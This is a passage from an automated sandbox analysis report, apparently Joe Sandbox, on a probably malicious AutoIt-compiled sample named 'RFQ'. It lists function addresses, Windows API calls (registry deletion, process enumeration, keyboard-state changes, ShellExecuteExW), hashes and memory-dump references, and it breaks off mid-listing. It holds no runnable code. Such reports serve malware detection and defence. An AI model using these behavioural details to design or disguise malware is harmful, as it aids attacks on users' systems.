                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                                    • Opcode ID: bd72dc4f1efb42323c4b5228fbed5dc2a0b65f48f90e134907d53fc0664d0bc3
                                                                                                                                                    • Instruction ID: 33d1a7ac5cb5aadb1dcd7566ac162f97c2c691535fd6b9f3dd85eee4f9497cb5
                                                                                                                                                    • Opcode Fuzzy Hash: bd72dc4f1efb42323c4b5228fbed5dc2a0b65f48f90e134907d53fc0664d0bc3
                                                                                                                                                    • Instruction Fuzzy Hash: D7316D72100214BFEF208F50DC4AFEA3BAAEF4A755F044165FE09DA191D6799C41CB74
                                                                                                                                                    Function 007A0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 007A016D
                                                                                                                                                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 007A038D
                                                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007A03AB
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 007A03D6
                                                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007A03FF
                                                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 007A0421
                                                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 007A0440
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3356174886-0
                                                                                                                                                    • Opcode ID: 3912f1effcfe8ba263d56faf4b0ae24814f9e4f7557a877510929c296fa99325
                                                                                                                                                    • Instruction ID: 8f5096d9d50e31159bb334e9ebf3487f5f4663e4923b1f574a65a7ca843ae654
                                                                                                                                                    • Opcode Fuzzy Hash: 3912f1effcfe8ba263d56faf4b0ae24814f9e4f7557a877510929c296fa99325
                                                                                                                                                    • Instruction Fuzzy Hash: DEA1A135600616EFDF18CF68C9897BDBBB1BF8A741F048619ED549B290D738AD50CB90
                                                                                                                                                    Function 0074AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 64a70afe27f00c83b9c1fc9926b69a79aadd9e0e29a3949024f8854df2d826dc
                                                                                                                                                    • Instruction ID: 88f3c83273fb40fe6437afdb99277266b1c06df9f70e3ebe68913c3f48f05dce
                                                                                                                                                    • Opcode Fuzzy Hash: 64a70afe27f00c83b9c1fc9926b69a79aadd9e0e29a3949024f8854df2d826dc
                                                                                                                                                    • Instruction Fuzzy Hash: 7A718BB1904109FFDB14CF98CC88AAEBB74FF89314F148259F915AA250C338EA05CF65
                                                                                                                                                    Function 00792230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0079225A
                                                                                                                                                    • _memset.LIBCMT ref: 00792323
                                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00792368
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                      • Part of subcall function 0074C6F4: _wcscpy.LIBCMT ref: 0074C717
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0079242F
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0079243E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 4082843840-2766056989
                                                                                                                                                    • Opcode ID: f0326933f430b4c51ce9b69abe08f0cea80c773b184acc800dd962857b721b8f
                                                                                                                                                    • Instruction ID: 18f5945dc9fa1a8b11ff8aeba715f89977e11e68999263745c1e63e820905d24
                                                                                                                                                    • Opcode Fuzzy Hash: f0326933f430b4c51ce9b69abe08f0cea80c773b184acc800dd962857b721b8f
                                                                                                                                                    • Instruction Fuzzy Hash: C371A0B0A00619EFCF05EFA4D8859AEB7F5FF48310F118059E855AB362DB38AD41CB90
                                                                                                                                                    Function 00773BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32(00000000), ref: 00773C02
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00773C17
                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00773C78
                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00773CA4
                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00773CC1
                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00773D05
                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00773D26
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                    • Opcode ID: 733388729636a830b4e51cef9949e8165a1210625ae2813c11558f3d8f870a71
                                                                                                                                                    • Instruction ID: ee3cbc5a05fc8657cdb68c62ae905f0c728038e6b5f59083ee52248c7102cc50
                                                                                                                                                    • Opcode Fuzzy Hash: 733388729636a830b4e51cef9949e8165a1210625ae2813c11558f3d8f870a71
                                                                                                                                                    • Instruction Fuzzy Hash: B351D3A06047D539FF3683248C45BB6BEA9AB06384F08C589E0DD5A4C2D39DEE94F760
                                                                                                                                                    Function 00793D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00793DA1
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00793DCB
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00793E80
                                                                                                                                                      • Part of subcall function 00793D72: RegCloseKey.ADVAPI32(?), ref: 00793DE8
                                                                                                                                                      • Part of subcall function 00793D72: FreeLibrary.KERNEL32(?), ref: 00793E3A
                                                                                                                                                      • Part of subcall function 00793D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00793E5D
                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00793E25
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 395352322-0
                                                                                                                                                    • Opcode ID: dd681e2dea89df5a356046cad70d899290c21f6b90f07b7ed44254fe77199d1a
                                                                                                                                                    • Instruction ID: dc6d8bfaa447e0e6f6eb0bd56ca205983df78f951c2ba24ecb5fa6fb59507f07
                                                                                                                                                    • Opcode Fuzzy Hash: dd681e2dea89df5a356046cad70d899290c21f6b90f07b7ed44254fe77199d1a
                                                                                                                                                    • Instruction Fuzzy Hash: F731C9B1911109BFDF159F94EC89EFFB7BCEF08300F00416AE512A2151E6789F899BA4
                                                                                                                                                    Function 00798FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00798FE7
                                                                                                                                                    • GetWindowLongW.USER32(0103DFF8,000000F0), ref: 0079901A
                                                                                                                                                    • GetWindowLongW.USER32(0103DFF8,000000F0), ref: 0079904F
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00799081
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007990AB
                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 007990BC
                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007990D6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2178440468-0
                                                                                                                                                    • Opcode ID: 74b063f23f530e48224c6010059c1a63a0d41e83a0ef28d616eec3d91d964264
                                                                                                                                                    • Instruction ID: f8d8172f98d10499f68033c5d36ada8ff44c23c7f2c3a625e8b34e13a9235374
                                                                                                                                                    • Opcode Fuzzy Hash: 74b063f23f530e48224c6010059c1a63a0d41e83a0ef28d616eec3d91d964264
                                                                                                                                                    • Instruction Fuzzy Hash: 0A310834600216DFEF208F5CEC89F6437A5EB49754F1442A8F6258B2B1CB79AC40DB45
                                                                                                                                                    Function 007708AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007708F2
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00770918
                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0077091B
                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00770939
                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00770942
                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00770967
                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00770975
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                    • Opcode ID: 2e19e0eff26c8a5afe784c7be1ebe82f5e9eafa138fb0bb2940e0172fa9fee0c
                                                                                                                                                    • Instruction ID: f0317f78ac7133d18f4060d92e253c9d1fbc5eb2a5cc73497b6716f298623bff
                                                                                                                                                    • Opcode Fuzzy Hash: 2e19e0eff26c8a5afe784c7be1ebe82f5e9eafa138fb0bb2940e0172fa9fee0c
                                                                                                                                                    • Instruction Fuzzy Hash: 24216776601219EF9F109F78DC88EAB73ACEB09360B00C125F919DB151E678EC458BA4
                                                                                                                                                    Function 00772472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                    • API String ID: 1038674560-2734436370
                                                                                                                                                    • Opcode ID: 1d9239fc0128c1c382ca09725af3f36ed0d3faec47b1742afb2680159be1d211
                                                                                                                                                    • Instruction ID: 96db5f1302a0980d7003c1f133015b7723e882bf6d37c03e68cf7601fdac9ef9
                                                                                                                                                    • Opcode Fuzzy Hash: 1d9239fc0128c1c382ca09725af3f36ed0d3faec47b1742afb2680159be1d211
                                                                                                                                                    • Instruction Fuzzy Hash: 4B214872204151B7CA31A6249C16FB7B398EF65390F60C42AF85A97043E79D9D5383A5
                                                                                                                                                    Function 00770986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007709CB
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007709F1
                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 007709F4
                                                                                                                                                    • SysAllocString.OLEAUT32 ref: 00770A15
                                                                                                                                                    • SysFreeString.OLEAUT32 ref: 00770A1E
                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00770A38
                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00770A46
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                    • Opcode ID: 59f02f07cc285d9082dc6b1f1b5ec4ed08b09732e259992290d236da9debd6a2
                                                                                                                                                    • Instruction ID: ff5c0d1d39a993e2e44a9bbe0f17d16d840e83a1560d0028e3c9d49999cbcf33
                                                                                                                                                    • Opcode Fuzzy Hash: 59f02f07cc285d9082dc6b1f1b5ec4ed08b09732e259992290d236da9debd6a2
                                                                                                                                                    • Instruction Fuzzy Hash: 38213275600204AF9F109BACDC89DAB77ECEF483A0B41C125F949CB2A5E678EC418B64
                                                                                                                                                    Function 0079A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0074D1BA
                                                                                                                                                      • Part of subcall function 0074D17C: GetStockObject.GDI32(00000011), ref: 0074D1CE
                                                                                                                                                      • Part of subcall function 0074D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0074D1D8
                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0079A32D
                                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0079A33A
                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0079A345
                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0079A354
                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0079A360
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                                                    • Opcode ID: 780bde45534b1087cf2c5e550cad28abd6d79f72f0934d1e95a7cdb569aa157d
                                                                                                                                                    • Instruction ID: 876708fc144fb637e5a350e055f692fd60aeb6d60de82ad24e883e9b658d1637
                                                                                                                                                    • Opcode Fuzzy Hash: 780bde45534b1087cf2c5e550cad28abd6d79f72f0934d1e95a7cdb569aa157d
                                                                                                                                                    • Instruction Fuzzy Hash: 741190B1150219BEEF119F61DC85EEB7F6DFF09798F014114FA08A61A0C7769C21DBA4
                                                                                                                                                    Function 0074CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0074CCF6
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0074CD37
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0074CD5F
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0074CE8C
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0074CEA5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1296646539-0
                                                                                                                                                    • Opcode ID: a51d727f3dcda6d1e8a5c55f2fef651421a305b0d3e7c15a25ce4068019e1666
                                                                                                                                                    • Instruction ID: 618c49a0e41a8a83a380c90e5a94c1127165cbe55d37d1fb76608e8c73463d07
                                                                                                                                                    • Opcode Fuzzy Hash: a51d727f3dcda6d1e8a5c55f2fef651421a305b0d3e7c15a25ce4068019e1666
                                                                                                                                                    • Instruction Fuzzy Hash: 3DB18F79A00249DBDF50CFA8C5807EEB7B1FF48350F149529EC59EB250EB38A950CB64
                                                                                                                                                    Function 00791BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00791C18
                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00791C26
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 00791C54
                                                                                                                                                      • Part of subcall function 00751DFC: __wsplitpath_helper.LIBCMT ref: 00751E3C
                                                                                                                                                    • _wcscat.LIBCMT ref: 00791C69
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00791CDF
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00791CF1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1380811348-0
                                                                                                                                                    • Opcode ID: 6197ac825efa2147766aecc0c23bb1dbfc79e553e625ca07960159ff49202617
                                                                                                                                                    • Instruction ID: b14c01a639549985f5e24d313bb00eb481cd1a5286248920966e7f7111757c9c
                                                                                                                                                    • Opcode Fuzzy Hash: 6197ac825efa2147766aecc0c23bb1dbfc79e553e625ca07960159ff49202617
                                                                                                                                                    • Instruction Fuzzy Hash: BA519FB15043009FD720EF24D885EABB7ECEF88754F40492EF58597292EB78D904CBA2
                                                                                                                                                    Function 00792FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00793C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00792BB5,?,?), ref: 00793C1D
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007930AF
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007930EF
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00793112
                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0079313B
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0079317E
